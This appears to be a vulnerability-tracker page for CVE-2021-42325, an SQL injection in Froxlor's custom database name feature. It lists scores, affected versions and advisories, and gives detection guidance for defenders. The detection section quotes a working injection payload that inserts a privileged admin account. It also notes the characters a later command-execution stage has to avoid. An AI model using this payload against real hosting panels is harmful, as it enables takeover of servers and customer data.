CVE-2021-42325
published 2021-10-12CVE-2021-42325: Froxlor through 0.10.29.1 allows SQL injection in Database/Manager/DbManagerMySQL.php via a custom DB name.
PriorityP270critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
11.81%
95.6th percentile
Froxlor through 0.10.29.1 allows SQL injection in Database/Manager/DbManagerMySQL.php via a custom DB name.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| froxlor | froxlor | < 0.10.30 | 0.10.30 |
| froxlor | froxlor | >= 0 < 0.10.30 | 0.10.30 |
Detection & IOCsextracted from sources · hover to see the quote
command`;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);--↗
- →Monitor POST requests to /customer_mysql.php containing SQL metacharacters (backtick, semicolon, INSERT, --) in the `custom_suffix` parameter, which is the injection point for CVE-2021-42325. ↗
- →Alert on POST body containing URL-encoded SQL injection patterns targeting `custom_suffix`, specifically sequences like `%60%3B` (backtick+semicolon) followed by `insert+into+panel_admins`. ↗
- →Detect unexpected new rows in the `panel_admins` table, especially accounts with `customers_see_all=1`, `domains_see_all=1`, `caneditphpsettings=1`, and `change_serversettings=1` created outside normal admin workflows. ↗
- →Monitor the Froxlor 'Webserver reload command' field (System Settings > Webserver settings) for modifications by non-baseline admin accounts, as post-exploitation RCE is achieved by injecting commands there. ↗
- →Watch for execution of `wget` or `php` commands spawned from the Froxlor cron job process (running as root), particularly writing or executing files like /runme.php. ↗
- →The exploit requires the 'custom DB name' feature to be manually enabled (available from 0.10.28 onward); audit Froxlor configurations where this feature is active as a risk indicator. ↗
- ·The SQL injection via `custom_suffix` is only exploitable when the custom database name feature is manually enabled by the administrator; default installations are not vulnerable. ↗
- ·Exploitation requires an authenticated customer account; unauthenticated attackers cannot reach the vulnerable endpoint. ↗
- ·The RCE stage via 'Webserver reload command' filters the characters `;|&><\`$~?` via the `safe_exec` function; payloads must avoid these characters to succeed. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Froxlor SQL injection vulnerability
osv·2022-05-24
CVE-2021-42325 [CRITICAL] Froxlor SQL injection vulnerability
Froxlor SQL injection vulnerability
Froxlor through 0.10.29.1 allows SQL injection in `Database/Manager/DbManagerMySQL.php` via a custom DB name.
GHSA
Froxlor SQL injection vulnerability
ghsa·2022-05-24
CVE-2021-42325 [CRITICAL] CWE-89 Froxlor SQL injection vulnerability
Froxlor SQL injection vulnerability
Froxlor through 0.10.29.1 allows SQL injection in `Database/Manager/DbManagerMySQL.php` via a custom DB name.
No detection rules found.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.htmlhttps://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782https://www.exploit-db.com/exploits/50502http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.htmlhttps://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782https://www.exploit-db.com/exploits/50502
2021-10-12
Published